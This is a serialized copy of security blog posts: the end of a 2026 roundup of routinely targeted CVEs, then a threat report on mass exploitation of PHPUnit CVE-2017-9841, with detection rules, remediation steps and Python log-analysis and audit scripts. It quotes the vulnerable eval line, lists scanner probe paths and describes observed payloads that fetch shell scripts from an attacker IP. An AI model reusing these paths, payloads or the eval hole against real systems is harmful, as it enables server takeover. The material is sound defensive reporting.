",[47,944,947],{"href":945,"rel":946},"https:\u002F\u002Faws.amazon.com\u002Fblogs\u002Fsecurity\u002Famazon-threat-intelligence-teams-identify-interlock-ransomware-campaign-targeting-enterprise-firewalls\u002F",[51],"Interlock ransomware"," group more than a month prior to public disclosure.",[18,950,951],{},"Citrix NetScaler, Palo Alto Networks PAN-OS, and Fortinet products have all had their own well-covered zero-day disclosures over the first few months of this year, though none of them have enough publicly reported threat activity to qualify for “Routinely Targeted” 
status:",[22,953,954,960,972],{},[25,955,956,959],{},[295,957,958],{},"Citrix NetScaler CVE-2026-3055:"," Requires an uncommon configuration and a noisy attack, and even then, the attacker doesn't control which types of data are returned",[25,961,962,965,966,971],{},[295,963,964],{},"Palo Alto Networks PAN-OS CVE-2026-0300:"," An unspecified buffer overflow vulnerability in PAN-OS’s Captive Portal that lets a remote attacker execute arbitrary code as root and was ",[47,967,970],{"href":968,"rel":969},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fcaptive-portal-zero-day\u002F",[51],"exploited"," pre-disclosure by “likely state-sponsored” adversaries",[25,973,974,982,983,991],{},[295,975,976,977],{},"Fortinet FortiClient EMS ",[47,978,981],{"href":979,"rel":980},"https:\u002F\u002Fwww.fortiguard.com\u002Fpsirt\u002FFG-IR-26-099",[51],"CVE-2026-35616"," and ",[295,984,985,986],{},"FortiCloud ",[47,987,990],{"href":988,"rel":989},"https:\u002F\u002Ffortiguard.fortinet.com\u002Fpsirt\u002FFG-IR-26-060",[51],"CVE-2026-24858"," were both exploited as zero-days by unattributed threat actors",[993,994,888],"h3",{"id":995},"a-note-on-cisco-sd-wan-cves",[18,997,998,999,1004,1005,1010],{},"In February 2026, the Cisco Talos team published a blog on UAT-8616 exploitation of two vulnerabilities in Catalyst SD-WAN: An older flaw, CVE-2022-20775, and a new initial access zero-day, CVE-2026-20127. The same day, Cisco published an ",[47,1000,1003],{"href":1001,"rel":1002},"https:\u002F\u002Fsec.cloudapps.cisco.com\u002Fsecurity\u002Fcenter\u002Fcontent\u002FCiscoSecurityAdvisory\u002Fcisco-sa-sdwan-authbp-qwCX8D4v",[51],"aggregate advisory"," for five additional vulnerabilities in Catalyst SD-WAN that the VulnCheck team analyzed and ",[47,1006,1009],{"href":1007,"rel":1008},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fcisco-sd-wan-manager-vulns",[51],"wrote about here",". 
None of these five CVEs was exploited at time of disclosure; as of May 18, all but one have been used in the wild.",[18,1012,1013,1014,1018,1019,1024],{},"Part of VulnCheck’s SD-WAN ",[47,1015,1017],{"href":1007,"rel":1016},[51],"analysis"," back in early March was that a public PoC ostensibly targeting CVE-2026-20127 — i.e., the SD-WAN initial access zero-day that drew most of the attention — actually wasn’t hitting that CVE at all, but rather three other vulnerabilities from Cisco’s aggregate disclosure: CVE-2026-20122, CVE-2026-20128, and CVE-2026-20133. On May 14, Cisco Talos ",[47,1020,1023],{"href":1021,"rel":1022},"https:\u002F\u002Fblog.talosintelligence.com\u002Fsd-wan-ongoing-exploitation\u002F",[51],"published a new blog"," on ongoing exploitation of SD-WAN vulnerabilities noting that the same public PoC (“XenShell”) was driving widespread exploitation to deploy webshells. Because Cisco Talos’s May 14 blog contains details on 10 different threat clusters exploiting SD-WAN vulnerabilities, we have classified CVE-2026-20127 and the three “XenShell” CVEs as routinely targeted.",[61,1026,1028],{"id":1027},"most-researched-cves","Most Researched CVEs",[18,1030,1031],{},"While there’s usually some overlap between CVEs that security researchers develop exploits for and the CVEs that get exploited in the wild, researchers tend to prioritize exploit development for vulnerabilities in open-source or free software they can access easily, whereas adversaries are more opportunistic (translation: not constrained by terms of use or things like “legality”). 
2026 so far has followed this same pattern — the CVEs with the highest number of public exploits are primarily in open or otherwise accessible code bases.",[18,1033,1034,1035,1040,1041,1044],{},"The most researched vulnerability of 2026 so far is CVE-2026-31431, aka “Copy Fail,” a Linux kernel privilege escalation flaw that was discovered with AI assistance and disclosed with some of the most spectacularly FUD-driven marketing we’ve witnessed to date. Nevertheless, the vulnerability is legitimate, though the community should note that the original PoC released with the vuln ",[47,1036,1039],{"href":1037,"rel":1038},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2026-05-08#cve-2026-31431-copy-fail-linux-kernel-local-privilege-escalation",[51],"was destructive"," and would overwrite the ",[886,1042,1043],{},"su"," binary. Copy Fail has spawned 130+ working PoCs and counting, almost all of which are derivative rather than novel implementations. Other highly researched 2026 vulnerabilities so far include:",[22,1046,1047,1057,1063,1069,1081],{},[25,1048,1049,1052,1053,1056],{},[295,1050,1051],{},"CVE-2026-20841:"," A critical auth bypass via argument injection in Gnu Inetutils ",[886,1054,1055],{},"telnetd"," with nearly 50 known exploits; the vuln has also been operationalized by the Qilin ransomware family",[25,1058,1059,1062],{},[295,1060,1061],{},"CVE-2026-41940:"," Broadly exploited cPanel and WHM authentication bypass with 25+ public exploits",[25,1064,1065,1068],{},[295,1066,1067],{},"CVE-2026-23744:"," A missing auth vulnerability in MCPJam Inspector, a popular MCP development and testing platform, with 19 public exploits and a variety of VulnCheck Canary detections",[25,1070,1071,1074,1075,1080],{},[295,1072,1073],{},"CVE-2026-33017:"," A critical code injection RCE bug in popular agentic platform Langflow with a dozen-ish exploits, whose exploitation Sysdig’s threat research group 
",[47,1076,1079],{"href":1077,"rel":1078},"https:\u002F\u002Fwww.sysdig.com\u002Fblog\u002Fcve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours",[51],"catalogued"," in depth in March",[25,1082,1083,1086],{},[295,1084,1085],{},"CVE-2026-21858 (aka “Ni8mare”):"," An infoleak vulnerability in workflow automation platform n8n that VulnCheck Canaries have seen expansive scanning and exploit attempts for; it’s also seen Zerobot exploitation",[18,1088,1089],{},"Several other vulnerabilities with 10+ public exploits were omitted from this list because they haven’t yet seen real-world exploitation, including CVE-2025-2304 (Camaleon CMS), CVE-2026-29000 (pac4j-jwt JwtAuthenticator), and CVE-2026-20841 (Windows Notepad).",[61,1091,1093],{"id":1092},"the-year-of-the-supply-chain-attack","The Year of the Supply Chain Attack?",[18,1095,1096,1097,1102,1103,1108,1109,1114,1115,1120,1121,1126],{},"Our 2026 Routinely Targeted Vulnerabilities list also includes two CVEs used to mark significant supply chain incidents in a chaotic year for supply chain security: CVE-2025-15556 tracked a Notepad++ ",[47,1098,1101],{"href":1099,"rel":1100},"https:\u002F\u002Fnotepad-plus-plus.org\u002Fnews\u002Fhijacked-incident-info-update\u002F",[51],"infrastructure compromise"," that “allowed malicious actors to intercept and redirect update traffic destined for notepad-plus-plus.org.” The incident occurred across more than half of 2025 before the maintainers discovered and disclosed it in February 2026. 
In their analysis of a custom backdoor, security firm Rapid7 ",[47,1104,1107],{"href":1105,"rel":1106},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002Ftr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit\u002F",[51],"attributed the incident"," to Chinese state-sponsored threat actor ",[47,1110,1113],{"href":1111,"rel":1112},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FLotus%20Blossom",[51],"Lotus Blossom",", which commonly targets organizations in Southeast Asia. Also included in our 2026 data is CVE-2026-33634, which tracked a far-reaching supply chain compromise that started upstream with popular vulnerability scanner Trivy and ",[47,1116,1119],{"href":1117,"rel":1118},"https:\u002F\u002Fsnyk.io\u002Fblog\u002Fpoisoned-security-scanner-backdooring-litellm\u002F",[51],"spread to LiteLLM"," and Checkmarx KICS — LiteLLM alone had 3.4 million daily downloads. The attack was attributed to TeamPCP, a financially motivated threat group who’s claimed a ",[47,1122,1125],{"href":1123,"rel":1124},"https:\u002F\u002Fwww.trendmicro.com\u002Fen_us\u002Fresearch\u002F26\u002Fe\u002Fanalyzing-teampcp-supply-chain-attacks.html",[51],"spate of supply chain attacks"," this year.",[18,1128,1129,1130,1134,1135,1140,1141,982,1146,1151,1152,1157,1158,1163,1164,1169,1170,1175],{},"There’s much debate in the CVE community over whether CVEs are the right mechanism to track and report on supply chain compromises. For better or worse, CVEs ",[1131,1132,1133],"em",{},"are"," commonly used to denote backdoored or otherwise compromised software versions, but they’re not used consistently. 
March 2026’s axios npm supply chain ",[47,1136,1139],{"href":1137,"rel":1138},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fsupply-chain-compromise-axios-npm-package",[51],"incident",", for instance, put tens of millions of users at risk after the hugely popular package was poisoned with a cross-platform RAT in an attack ",[47,1142,1145],{"href":1143,"rel":1144},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fnorth-korea-threat-actor-targets-axios-npm-package",[51],"Google Threat Intel",[47,1147,1150],{"href":1148,"rel":1149},"https:\u002F\u002Fwww.elastic.co\u002Fsecurity-labs\u002Faxios-one-rat-to-rule-them-all",[51],"Elastic"," attributed to North Korea. The only CVE assigned was ",[47,1153,1156],{"href":1154,"rel":1155},"https:\u002F\u002Fgithub.com\u002Fusebruno\u002Fbruno\u002Fsecurity\u002Fadvisories\u002FGHSA-658g-p7jg-wx5g",[51],"CVE-2026-34381",", which a downstream package (@usebruno\u002Fcli) apparently used to track impact from the axios compromise. 
On May 11, the maintainers of TanStack, another popular package, disclosed another TeamPCP-attributed ",[47,1159,1162],{"href":1160,"rel":1161},"https:\u002F\u002Ftanstack.com\u002Fblog\u002Fnpm-supply-chain-compromise-postmortem",[51],"supply chain attack"," that compromised ",[47,1165,1168],{"href":1166,"rel":1167},"https:\u002F\u002Fsnyk.io\u002Fblog\u002Ftanstack-npm-packages-compromised\u002F",[51],"40+ packages"," via the self-spreading “",[47,1171,1174],{"href":1172,"rel":1173},"https:\u002F\u002Fwww.stepsecurity.io\u002Fblog\u002Fmini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem",[51],"mini Shai-Hulud","” worm.",[61,1177,1179],{"id":1178},"_2026-vulncheck-kev-trending","2026 VulnCheck KEV Trending",[18,1181,1182,1183,1186],{},"VulnCheck’s industry-leading Known Exploited Vulnerabilities (KEV) list has added 394 new CVEs with in-the-wild exploitation evidence so far this year — a ",[295,1184,1185],{},"59% increase"," in new KEVs when compared with the same period last year. VulnCheck’s research team has also observed a noticeably higher volume of prior-year CVEs (i.e., “CVE-2025” vulnerabilities) racking up first-time exploitation evidence year over year — meaning both the number of exploited “CVE-2026” flaws and net-new reports of prior year (“CVE-2025”) exploitation have increased significantly this year.",[18,1188,1189,1190,1193,1194,1199],{},"But it also bears noting that overall CVE volume is ",[1131,1191,1192],{},"also"," up in 2026, and major CNAs are starting to show significant shifts (upticks) in CVE disclosures, as our research team ",[47,1195,1198],{"href":1196,"rel":1197},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fai-assisted-vulnerability-discovery",[51],"wrote about"," just last week. 
Thus far, the higher volume of new KEVs appears to be roughly proportional to overall CVE volume growth, which is to say that AI is contributing to an acceleration of known patterns in vulnerability disclosure and exploitation.",[61,1201,202],{"id":201},[18,1203,1204],{},"VulnCheck’s research team tracks real-world exploitation, attacker infrastructure, and exploit patterns across our Canary Intelligence, Exploit & Vulnerability Intelligence (EVI), and IP Intelligence datasets. By delivering machine-consumable, evidence-driven intelligence on new vulnerabilities and how real attackers can use them in the wild, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on inaccurate scores or delayed consensus.",[18,1206,1207,1208,1213,1214,1219,1220],{},"For more analysis of vulnerability and exploit trends, see the ",[47,1209,1212],{"href":1210,"rel":1211},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002F2026-vulncheck-exploit-intelligence-report",[51],"2026 VulnCheck Exploit Intelligence Report",", or check out or our blogs ",[47,1215,1218],{"href":1216,"rel":1217},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fnetwork-edge-device-report-2026",[51],"2026 State of Exploitation: Exploiting The Network Edge"," and\n",[1131,1221,1222,59],{},[47,1223,1225],{"href":1196,"rel":1224},[51],"The First CVE Wave: Signs That AI-Assisted Vulnerability Discovery Is Reshaping Disclosure Volumes",[18,1227,1228,1229,1234,1235,1240,1241,1246,1247,1246,1252,1255,1256,1260],{},"Sign up for the VulnCheck community today to get free access to our ",[47,1230,1233],{"href":1231,"rel":1232},"https:\u002F\u002Fwww.vulncheck.com\u002Fkev",[51],"VulnCheck KEV",", enjoy our comprehensive ",[47,1236,1239],{"href":1237,"rel":1238},"https:\u002F\u002Fconsole.vulncheck.com\u002Fbrowse",[51],"vulnerability data",", and request a trial of our 
",[47,1242,1245],{"href":1243,"rel":1244},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Finitial-access-intelligence",[51],"Initial Access Intelligence",", ",[47,1248,1251],{"href":1249,"rel":1250},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fip-intelligence",[51],"IP Intelligence",[47,1253,283],{"href":281,"rel":1254},[51],", and ",[47,1257,216],{"href":1258,"rel":1259},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fexploit-intelligence",[51]," products.",{"title":219,"searchDepth":220,"depth":220,"links":1262},[1263,1267,1268,1269,1270],{"id":895,"depth":220,"text":896,"children":1264},[1265],{"id":995,"depth":1266,"text":888},3,{"id":1027,"depth":220,"text":1028},{"id":1092,"depth":220,"text":1093},{"id":1178,"depth":220,"text":1179},{"id":201,"depth":220,"text":202},"2026-05-21","VulnCheck identified 25 CVEs disclosed in 2026 that have been routinely targeted by adversaries and researchers so far this year, drawing from a global body of exploit code and exploitation data.",{"slug":1274},"routinely-targeted-vulnerabilities-may-2026","\u002Fblog\u002Froutinely-targeted-vulnerabilities-may-2026",{"title":247,"description":1272},"blog\u002Froutinely-targeted-vulnerabilities-may-2026",[242,1279,1280,1281],"kev","vuln-intel","initial-access","uBpw_PVohgwz9oUF9uuyNhVkIwMDZnsetLKjPUBzIR4",{"id":1284,"title":1285,"articles":7,"authors":1286,"body":1291,"date":2934,"description":2935,"extension":234,"image":7,"link":7,"meta":2936,"navigation":237,"path":2937,"seo":2938,"series":7,"stem":2939,"subtype":7,"tags":2940,"__hash__":2944},"blog\u002Fblog\u002Fcve-2017-9841.md","9 Year-Old PHP Vulnerability Keeps Swinging As One of the Most Targeted Vulnerabilities",[1287],{"name":1288,"link":1289,"linkName":1290},"Neal 
By [Neal Dennis](https://www.linkedin.com/in/myprofiledennis)

**CVE:** CVE-2017-9841 | **CVSS:** 9.8 Critical | **EPSS:** 94.2% (99.9th percentile)

---

Some vulnerabilities get patched, forgotten, and fade into the historical record. CVE-2017-9841 is not one of them.

Nearly a decade after PHPUnit's `eval-stdin.php` file was identified as a trivially exploitable remote code execution vector, VulnCheck Canary data shows the vulnerability is one of the most actively targeted in our systems, with over **80,000 exploitation attempts detected in the last 30 days** across our global Canaries network, and more than **36,500 hits in just the last 10 days**. Attackers haven't moved on. If anything, the scanning infrastructure has grown more sophisticated.

This post breaks down what's happening, who's scanning, how the attack works, and what defenders should do about it in 2026.

This report is based on data from the last 30 days, ending 11 May.

---

## What Is CVE-2017-9841?

CVE-2017-9841 is a remote code execution vulnerability in **PHPUnit**, the widely used PHP testing framework. It was disclosed in June 2017 and affects versions prior to 4.8.28 and 5.x before 5.6.3.

The vulnerability exists in a file called `eval-stdin.php`, located at:

```text
vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```

This file was included in PHPUnit for testing purposes and contains a single, devastating line:

```php
eval('?>' . file_get_contents('php://input'));
```

When an attacker sends a POST request to this file with PHP code in the request body, the server executes it: no authentication required, no special headers needed. It's about as clean an RCE as you'll find.

The root cause isn't a subtle logical flaw or a memory corruption bug. It's a testing utility that was never meant to be exposed to the internet, shipped inside a Composer dependency, and left accessible in production environments that failed to exclude development dependencies from their deployment artifacts.

---

## VulnCheck Canary Data: What We're Seeing Right Now

VulnCheck Canaries are purpose-built devices designed to detect real-world exploitation attempts against known vulnerabilities. Over the past 30 days, our Canaries have logged **80,119 CVE-2017-9841 exploitation attempts**, all matching the signature `VULNCHECK PHPUnit CVE-2017-9841 Exploit Attempt`.

In the last 10 days alone, that number stands at **36,543 hits** — indicating sustained, ongoing campaign activity rather than a one-time burst.

### Botnet Infrastructure

The majority of observed traffic is originating from a small number of IPs, with the most active being:

| Source IP | ASN | Country | Notable |
|---|---|---|---|
| 185.38.148.2 | AS25369 – Hydra Communications Ltd | United Kingdom | Primary scanner |
| 66.179.137.126 | AS8560 – IONOS SE | United States | Secondary scanner |

IP `185.38.148.2` is particularly active, and this host is not exclusively targeting CVE-2017-9841. Our Canary logs show the same IP simultaneously probing for **CVE-2022-47945** (ThinkPHP RCE), **CVE-2024-4577** (PHP CGI argument injection), and **CVE-2021-41773** (Apache path traversal RCE). This is mass-scanning infrastructure running a multi-exploit playbook against any reachable web server.

### Path Enumeration

What makes these scans notable is the exhaustive path enumeration. Rather than checking a single well-known location, attackers are probing dozens of framework-specific paths in sequence, reflecting a thorough understanding of how PHP projects are structured:

```text
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wordpress/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
... (30+ paths per scan session)
```

This breadth means the scanner is optimized to find PHPUnit in non-standard installation locations, not just the obvious `/vendor/` root but nested under application subdirectories, framework scaffolding, and common alias paths. A typical scan session hits 20–30 paths in rapid succession.

### VulnCheck-Observed Payloads

The POST payloads observed include:

- **Shell downloads:** Fetching remote shell scripts via `wget` or `curl` from attacker-controlled infrastructure (e.g., `https://125.135.169.171/sh`) and executing them
- **PHP webshell probing:** Using `<?php shell_exec(base64_decode(...))` to execute encoded commands, often including credential theft or pivoting scripts
- **Fingerprinting:** Some payloads use `echo(md5("Hello CVE-2024-4577"))` style responses to verify code execution before deploying more aggressive payloads
- **Multi-CVE chaining:** The same connection bundle includes attempts against CVE-2024-4577 (PHP CGI) and CVE-2017-9841 simultaneously, suggesting the tooling probes multiple PHP attack vectors in a single connection sweep

---

## Why Is This Still Happening in 2026?

This is the real question. The vulnerability was patched in mid-2017. CISA added it to the Known Exploited Vulnerabilities catalog in February 2022. It carries an EPSS score of **94.2% — placing it in the 99.9th percentile** of all CVEs by exploitation probability.

So why are attackers still finding victims?

### 1. Composer Dependencies Don't Self-Clean

PHPUnit is a development dependency. It's listed in `composer.json` under `require-dev`, not `require`. The intended deployment pattern is to run `composer install --no-dev` in production, which excludes testing dependencies including PHPUnit.

In practice, many deployments skip this step. Teams run `composer install` without the `--no-dev` flag during CI/CD pipelines that also serve production environments. Or they install with dev dependencies for debugging, and those files never get removed. The `vendor/` directory ends up in production with `eval-stdin.php` intact and web-accessible.

### 2. The Vendor Directory Gets Web-Served

PHP applications running on Apache or Nginx often serve the entire project directory, including `vendor/`. Unless there's an explicit server rule blocking access to `vendor/phpunit/`, the file is reachable at a predictable URL.

### 3. Legacy Codebases Don't Get Updated

Many PHP applications are maintained by small teams or individuals who installed dependencies years ago and haven't revisited them. The underlying application may be working fine, so no one updates PHPUnit from 4.x to a patched version. The dependency stays frozen, vulnerable, and accessible.

### 4. The Attack Tool Ecosystem Is Mature

Our exploit intelligence index shows **18 public exploits** for CVE-2017-9841, including dedicated mass-scanners (`phpunit-brute`, `laravel-phpunit-rce-masscaner`, `PHPUnit-GoScan`), Nuclei templates, Metasploit modules, and a weaponized initial-access module. The barrier to running this scan is approximately zero.

---

## Botnet Attribution

VulnCheck's exploit intelligence data shows CVE-2017-9841 has been leveraged by **several botnets** including **RondoDox, Kinsing, KashmirBlack, Sysrv and Androxgh0st**. Persistent botnet activity was first observed in 2020 and remains active as recently as May 2026. This is not opportunistic one-off scanning — it's embedded in the standing playbooks of criminal infrastructure that systematically sweeps the internet for exploitable PHP applications.

---

## Detection

**What to look for in web server logs:**

```text
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
POST /*/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```

Any POST request to a path containing `phpunit` and `eval-stdin.php` is a red flag regardless of response code. A `200 OK` means the file exists and accepted the request body, so treat it as successful exploitation. A `404` means the file wasn't found at that path — but your system may still be vulnerable if the file exists elsewhere.

**Network-level indicators:**

- User-agent: `libredtail-http` (observed in current campaigns)
- PHP webshell beaconing to `125.135.169.171` (observed C2 in active payloads)
- High-frequency sequential requests to 20+ `phpunit` paths from a single IP

**SIEM/WAF rules to add:**

```text
uri_path contains "eval-stdin.php" AND request_method = "POST"
uri_path contains "phpunit" AND uri_path contains "Util/PHP"
```
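The log patterns and indicators above are easy to turn into a small detector. The Python script below is an added example written for this post, not VulnCheck's tooling: it parses Apache/nginx combined-format access log lines, flags POST requests to any `eval-stdin.php` path (reporting `2xx` responses separately from `404`s, as described above), and marks an IP as a scanner when it has hit 20 or more distinct PHPUnit paths or presents the `libredtail-http` user-agent. The log lines it runs on are constructed for the demo; the IPs are from documentation ranges and the timestamps are made up.

```python
"""Flag CVE-2017-9841 (PHPUnit eval-stdin.php) exploitation attempts in access logs.

Added example, not VulnCheck's tooling. Reads Apache/nginx "combined" format lines.
SAMPLE_LOG below is constructed for the demo (documentation-range IPs, made-up
timestamps) to mirror the scan pattern described in the post.
"""
import re
from collections import defaultdict

# combined log format:
# ip ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# eval-stdin.php at any depth, i.e. the post's rule:
# uri_path contains "phpunit" AND uri_path contains "Util/PHP"
EVAL_STDIN_RE = re.compile(r'phpunit/.*util/php/eval-stdin\.php', re.IGNORECASE)
PHPUNIT_PATH_RE = re.compile(r'phpunit', re.IGNORECASE)

KNOWN_BAD_UA = {"libredtail-http"}  # user-agent seen in current campaigns
SCAN_THRESHOLD = 20                 # a scan session hits 20-30 paths


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Verdict for one parsed request aimed at eval-stdin.php, else None."""
    path = entry["path"].split("?", 1)[0]
    if not EVAL_STDIN_RE.search(path):
        return None
    if entry["method"] != "POST":
        return "probe"                  # GET/HEAD existence check, no payload
    if entry["status"].startswith("2"):
        return "likely_exploited"       # file exists and accepted the body
    if entry["status"] == "404":
        return "attempt_not_found"      # absent here; may exist at another path
    return "attempt_other"


def analyze(lines):
    """Per-request verdicts plus the IPs that behave like mass scanners."""
    verdicts = []
    paths_by_ip = defaultdict(set)
    uas_by_ip = defaultdict(set)
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        path = e["path"].split("?", 1)[0]
        if PHPUNIT_PATH_RE.search(path):
            paths_by_ip[e["ip"]].add(path)
            uas_by_ip[e["ip"]].add(e["ua"])
        v = classify(e)
        if v:
            verdicts.append((e["ip"], path, e["status"], v))
    scanners = sorted(
        ip for ip, paths in paths_by_ip.items()
        if len(paths) >= SCAN_THRESHOLD or uas_by_ip[ip] & KNOWN_BAD_UA
    )
    return {
        "verdicts": verdicts,
        "scanners": scanners,
        "paths_per_ip": {ip: len(p) for ip, p in paths_by_ip.items()},
    }


# --- constructed sample log (not real traffic) ---
EVAL_STDIN = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
PREFIXES = ["", "/laravel", "/drupal", "/yii", "/zend", "/wordpress", "/cms",
            "/crm", "/admin", "/backup", "/api", "/public", "/lib", "/app",
            "/site", "/web", "/blog", "/shop", "/dev", "/test", "/old", "/new",
            "/v1", "/v2", "/www"]


def log_line(ip, method, path, status, ua):
    return (f'{ip} - - [11/May/2026:10:00:00 +0000] "{method} {path} HTTP/1.1" '
            f'{status} 123 "-" "{ua}"')


SAMPLE_LOG = (
    [log_line("203.0.113.5", "POST", p + EVAL_STDIN, 404, "libredtail-http")
     for p in PREFIXES]                                                  # enumerating scanner
    + [log_line("198.51.100.7", "POST", EVAL_STDIN, 200, "Mozilla/5.0")]  # successful hit
    + [log_line("192.0.2.9", "GET", "/index.php", 200, "Mozilla/5.0")]    # benign traffic
)

if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip in result["scanners"]:
        print(f"scanner: {ip} ({result['paths_per_ip'][ip]} phpunit paths)")
    for ip, path, status, verdict in result["verdicts"]:
        if verdict == "likely_exploited":
            print(f"INVESTIGATE: {ip} POST {path} -> {status}")
```

On the constructed sample the enumerating host is reported as a scanner (25 distinct paths and the campaign user-agent), and the single `200` response is surfaced as the one request that needs an incident response look; the 404s from the scanner are recorded but not escalated, matching the post's guidance that a 404 is not proof of absence.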
---

## Remediation

**If you run PHP applications:**

1. **Audit your vendor directory.** Check whether `vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php` exists on any internet-facing server. If it does, you have a problem regardless of whether you've been exploited.
2. **Redeploy without dev dependencies.** Run `composer install --no-dev` in all production environments and remove the existing `vendor/` directory before reinstalling.
3. **Block web access to vendor/.** Add server-level rules to deny HTTP access to your `vendor/` directory entirely. This should be standard practice regardless of PHPUnit.

   **Nginx:**

   ```nginx
   location ~* /vendor/ {
       deny all;
       return 403;
   }
   ```

   **Apache (server or virtual host config):**

   ```apache
   <DirectoryMatch "vendor">
       Require all denied
   </DirectoryMatch>
   ```

   `<DirectoryMatch>` is not permitted in `.htaccess`; there, `RedirectMatch 403 /vendor/` (mod_alias) gives the same result.
4. **Update PHPUnit.** If you need PHPUnit in your environment, use version 4.8.28+ or 5.6.3+, where this file was removed.
5. **Check for indicators of compromise.** If the file was present and accessible, review access logs for POST requests to `eval-stdin.php`. Any 200-series responses warrant a full incident response investigation.
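Steps 1, 2 and 4 can be checked offline against a deployed tree. The Python script below is an added example, not part of VulnCheck's post: it walks a directory for `eval-stdin.php`, reads the `phpunit/phpunit` version Composer recorded in `vendor/composer/installed.json` (handling both the Composer 1 list layout and the Composer 2 `{"packages": [...]}` layout), and checks whether `composer.json` lists PHPUnit only under `require-dev`, which is what makes `composer install --no-dev` remove it. The version check assumes, beyond the 4.8.28 and 5.6.3 thresholds given above, that every later major release is also fixed. The deployment tree it audits is a constructed fixture, not real data.

```python
"""Offline audit of a deployed PHP tree for CVE-2017-9841 exposure.

Added example, not VulnCheck's tooling. Checks: is eval-stdin.php present anywhere
under the tree; which phpunit/phpunit version Composer recorded in
vendor/composer/installed.json; and whether composer.json lists PHPUnit only in
require-dev (so `composer install --no-dev` drops it). make_fixture() builds a
constructed deployment that shipped its dev dependencies; it is not real data.
"""
import json
import os
import tempfile

# Fixed releases per the advisory. Assumption: later majors (6.x and up) are
# also fixed, since the file was removed upstream.
FIXED = {4: (4, 8, 28), 5: (5, 6, 3)}


def parse_version(v):
    """'v4.8.27' or '4.8.27' -> (4, 8, 27); trailing non-numeric parts are dropped."""
    parts = []
    for piece in v.lstrip("v").split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    return tuple((parts + [0, 0, 0])[:3])


def is_fixed(version):
    v = parse_version(version)
    if v[0] in FIXED:
        return v >= FIXED[v[0]]
    return v[0] > 5


def find_eval_stdin(root):
    """Every eval-stdin.php under a .../Util/PHP/ directory, wherever vendor/ sits."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if "eval-stdin.php" in files and dirpath.replace(os.sep, "/").endswith("/Util/PHP"):
            hits.append(os.path.join(dirpath, "eval-stdin.php"))
    return sorted(hits)


def installed_phpunit_version(root):
    """Version from vendor/composer/installed.json (Composer 1 list or Composer 2 dict)."""
    path = os.path.join(root, "vendor", "composer", "installed.json")
    if not os.path.exists(path):
        return None
    with open(path) as f:
        data = json.load(f)
    packages = data.get("packages", []) if isinstance(data, dict) else data
    for pkg in packages:
        if pkg.get("name") == "phpunit/phpunit":
            return pkg.get("version")
    return None


def phpunit_is_dev_only(root):
    """True if composer.json has PHPUnit in require-dev but not in require."""
    path = os.path.join(root, "composer.json")
    if not os.path.exists(path):
        return None
    with open(path) as f:
        c = json.load(f)
    return ("phpunit/phpunit" in c.get("require-dev", {})
            and "phpunit/phpunit" not in c.get("require", {}))


def audit(root):
    files = find_eval_stdin(root)
    version = installed_phpunit_version(root)
    return {
        "exposed_files": files,
        "vulnerable": bool(files),           # presence of the file is what matters
        "phpunit_version": version,
        "version_fixed": is_fixed(version) if version else None,
        "removable_with_no_dev": phpunit_is_dev_only(root),
    }


def make_fixture():
    """Constructed tree: vendor/ deployed with dev deps and an old PHPUnit."""
    root = tempfile.mkdtemp(prefix="phpunit-audit-")
    util = os.path.join(root, "vendor", "phpunit", "phpunit", "src", "Util", "PHP")
    os.makedirs(util)
    os.makedirs(os.path.join(root, "vendor", "composer"))
    with open(os.path.join(util, "eval-stdin.php"), "w") as f:
        f.write("<?php\neval('?>' . file_get_contents('php://input'));\n")
    with open(os.path.join(root, "vendor", "composer", "installed.json"), "w") as f:
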